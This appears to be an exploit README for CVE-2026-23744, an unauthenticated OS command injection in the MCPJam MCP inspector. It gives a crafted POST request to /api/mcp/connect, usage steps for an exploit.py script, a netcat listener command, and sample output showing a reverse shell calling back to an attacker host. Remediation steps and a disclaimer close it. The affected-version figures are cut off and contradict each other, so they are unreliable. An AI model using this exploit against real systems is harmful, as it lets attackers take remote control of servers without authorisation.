Share
## https://sploitus.com/exploit?id=903D328B-6435-59B6-B1CB-0ECF3BF14DB4
# CVE-2026-23744 โ€” MCPJam Unauthenticated Remote Code Execution

## Summary

MCPJam is an open-source MCP (Model Context Protocol) inspector and proxy used to connect, debug, and manage MCP servers. Versions **= 1.4.3 |
| **Attack Vector** | Network โ€” No Authentication Required |
| **Disclosure**  | 2026-01-15 |

---

## Technical Analysis

The vulnerable endpoint accepts an unauthenticated JSON `POST` request:

```http
POST /api/mcp/connect HTTP/1.1
Host: :3000
Content-Type: application/json

{
  "serverConfig": {
    "command": "sh",
    "args": ["-c", ""],
    "env": {}
  },
  "serverId": "any_string"
}
```

MCPJam passes `command` and `args` directly to the Node.js process spawner
(`child_process.spawn` or equivalent) **without**:

- Input validation or command allowlisting
- Authentication or authorization enforcement on this endpoint
- Sandboxing, namespacing, or privilege dropping

An attacker who can reach port 3000 (default) can supply a reverse-shell
payload in `args[1]`, obtaining a shell as the MCPJam process owner โ€” often
`root` or a service account with broad system access.

### Root Cause

The absence of an authentication middleware guard on `/api/mcp/connect` combined
with uncontrolled use of user-supplied values in a process-spawn call creates a
textbook **unauthenticated OS command injection** (CWE-78).

---

## Exploit Usage

### Requirements

```bash
pip install requests urllib3
```

### Arguments

```
  -t, --target          Target IP or hostname
  -p, --port            Target port (default MCPJam: 3000)
  -l, --lhost           Local IP for reverse-shell callback
  -r, --lport           Local port for reverse-shell callback
      --timeout         Seconds to wait for target availability (default: 30)
      --shell-timeout   POST timeout before assuming shell dropped (default: 5)
  -v, --verbose         Print full HTTP response body
```

### Step-by-step

**1. Start a netcat listener on your machine:**

```bash
nc -lvnp 4444
```

**2. Run the exploit:**

```bash
# Basic
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444

# Verbose + extended availability timeout (slow targets)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 4444 --timeout 60 -v

# Longer shell timeout (give more time before assuming shell was established)
python3 exploit.py -t 10.10.11.50 -p 3000 -l 10.10.14.5 -r 9001 --shell-timeout 10
```

### Expected Output

```
 โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
 โ•‘     MCPJam  ยท  Unauthenticated RCE via serverConfig Injection     โ•‘
 โ•‘                        CVE-2026-23744                             โ•‘
 โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•
  CVE ID      :  CVE-2026-23744
  Component   :  MCPJam MCP Proxy Inspector
  Affected    :  = 1.2.4
  CVSS Score  :  9.8 (Critical)
  CVSS Vector :  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  CWE         :  CWE-78 โ€” OS Command Injection
  Type        :  Unauthenticated Remote Code Execution  (Network / No Auth)
  Reference   :  https://nvd.nist.gov/vuln/detail/CVE-2026-23744

  10:32:01 [*] Probing target 10.10.11.50:3000  (max 30s) ...
  10:32:02 [+] Target is alive โ€” HTTP 200

  10:32:02 [*] Exploit endpoint  : http://10.10.11.50:3000/api/mcp/connect
  10:32:02 [*] Reverse-shell CB  : 10.10.14.5:4444
  10:32:02 [!] Ensure listener   : nc -lvnp 4444
  10:32:02 [*] Firing payload    ...

  10:32:07 [+] POST timed out after 5s โ€” reverse shell likely established on 10.10.14.5:4444
  10:32:07 [+] Switch to your netcat listener โ€” incoming connection expected.

  10:32:07 [+] Exploit routine complete.
```

> **Timeout = success indicator.** When the POST request times out, the target
> process is blocking on the open reverse shell โ€” this is the expected behavior,
> confirming RCE was achieved. Switch to your listener immediately.

---

## Remediation

| Priority | Action |
|----------|--------|
| **Critical** | Update MCPJam to >= 1.2.4 |
| **High**     | Restrict `/api/mcp/connect` behind authentication middleware |
| **High**     | Apply a network-level firewall rule limiting access to the MCPJam port to trusted IPs |
| **Medium**   | Allowlist permitted values for `serverConfig.command` |
| **Medium**   | Run MCPJam inside a container / with a restricted Linux user (no shell, no `/dev/tcp`) |
| **Low**      | Enable audit logging on process spawn events |

---

## References

- [CVE-2026-23744: REC in MCPJam inspector due to HTTP Endpoint exposes](https://advisories.gitlab.com/npm/@mcpjam/inspector/CVE-2026-23744/)
- [NVD โ€” CVE-2026-23744](https://nvd.nist.gov/vuln/detail/CVE-2026-23744)
- [CWE-78: OS Command Injection](https://cwe.mitre.org/data/definitions/78.html)
- [OWASP: Command Injection](https://owasp.org/www-community/attacks/Command_Injection)
- [OWASP Top 10: A03 Injection](https://owasp.org/Top10/A03_2021-Injection/)
- [Model Context Protocol โ€” Security Considerations](https://modelcontextprotocol.io/specification/2025-11-05/basic/security_considerations)
- [MCPJam Project](https://github.com/mcpjam/mcpjam)

---

## Disclaimer

This exploit is provided strictly for **educational purposes and authorized security testing**. Use only against systems you own or have explicit written permission to test. Unauthorized use is illegal and unethical.